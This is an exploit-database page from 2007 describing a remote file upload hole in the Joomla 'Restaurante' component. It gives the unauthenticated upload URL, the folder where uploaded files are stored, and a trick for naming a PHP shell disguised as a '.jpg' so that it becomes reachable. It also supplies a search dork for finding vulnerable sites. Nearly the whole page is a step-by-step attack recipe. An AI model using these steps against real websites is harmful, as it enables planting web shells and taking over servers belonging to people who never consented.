Joomla Component Restaurante Remote File Upload Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component Restaurante Remote File Upload Vulnerability
# Published : 2007-09-08
# Author : Cold Zero
# Previous Title : Txx CMS 0.2 Multiple Remote File Inclusion Vulnerabilities
# Next Title : phpress 0.2.0 (adisplay.php lang) Local File Inclusion Vulnerability

Joomla Component Restaurante <= Remote File Upload Vulnerability

found by  : Cold z3ro

Homepage : www.hackteach.org , www.xp10.com

================================================================

@################################################################@
# joomla/index.php?option=com_restaurante&task=upload
#
# /joomla/components/com_restaurante/img_original/.shell.php.jpg
#
# Dork : /index.php?option=com_restaurante
@################################################################@


Attacker can upload any file using this link

joomla/index.php?option=com_restaurante&task=upload

after upload the file , He can find it in :

/components/com_restaurante/img_original

But the attacker should add ( Point ) befor filename

Example :

if attacker uploaded file named shell.php.jpg

its name will by like this .shell.php.jpg

in path :

/components/com_restaurante/img_original/.shell.php.jpg

# www.Syue.com [2007-09-08]